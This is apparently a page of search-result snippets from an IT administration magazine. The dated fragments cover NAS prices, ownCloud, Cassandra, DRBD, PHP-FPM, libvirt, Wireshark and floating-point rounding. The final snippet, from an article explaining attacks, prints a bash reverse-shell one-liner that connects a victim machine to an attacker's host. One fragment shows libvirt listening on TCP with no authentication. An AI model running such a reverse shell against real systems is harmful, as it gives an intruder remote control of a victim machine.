16%
05.12.2014
.12.6)
DSM 5.0-4493 Update 5 (Linux 3.2.40)
Thecus OS 5.0 (Linux 3.10.47)
ReadyNAS OS 6.1.9
Price (without disks,EUR incl. VAT)
$350/EUR390
$300/EUR250
$370/EUR430
16%
02.08.2021
CIS is the technology preview 1.8.0 (as of July 2021). Go, Vue.js, and a modular approach replace the outdated PHP, database, and POSIX filesystem the older versions needed. In internal documents, ownCloud promises up
16%
06.10.2019
pingtest.pl
01 #!/usr/bin/perl
02 use Cassandra::Client;
03
04 my $client=Cassandra::Client->new(
05 contact_points=>['172.21.0.2', '172.21.0.4', '172.21.0.5'],
06 username => 'admin',
07
16%
07.10.2025
.
Listing 1
DRBD Resource for VM
# vi /etc/drbd.d/proxy.res
resource proxy {
device drbd0;
disk /dev/drbd/proxy;
meta-disk internal;
on alice {
address 10.42.0.100:7789;
node-id 0
16%
31.10.2025
.
Launch Ramp
PHP-FPM has been part of the official PHP package since PHP 5.4.0 and is therefore also included by most current Linux distributions and available through their package managers. The package
16%
18.02.2014
that each Libvirt instance needs to open a TCP/IP socket. All you need are the following lines in /etc/libvirt/libvirtd.conf
:
listen_tls = 0
listen_tcp = 1
auth_tcp = "none"
The configuration shown does
16%
08.07.2013
-party cloud technologies with the help of its Delta Cloud API.
After all, CloudForms 1.1, DeltaCloud 1.0, Storage Server 2.0, JBoss Middleware, and Enterprise Virtualization 3.1 form the foundation
16%
27.11.2011
. It was formerly known as Ethereal and is probably known to many administrators by that name. The tool was renamed when version 0.99.1 of Wireshark was released, because Ethereal developer Gerald Combs left Ethereal
16%
19.06.2023
round to even
Round to the nearest value, ties round away from zero
Directed rounding toward 0
Directed rounding toward +infinity
Directed rounding toward −infinity
Converting from FP64
16%
13.12.2018
with Computer A (the victim system) receiving the following code:
$ bash -I <& /dev/tcp/10.0.0.1/444 0<&1
that causes Computer A to connect to Computer B (the attacking system that receives the connection from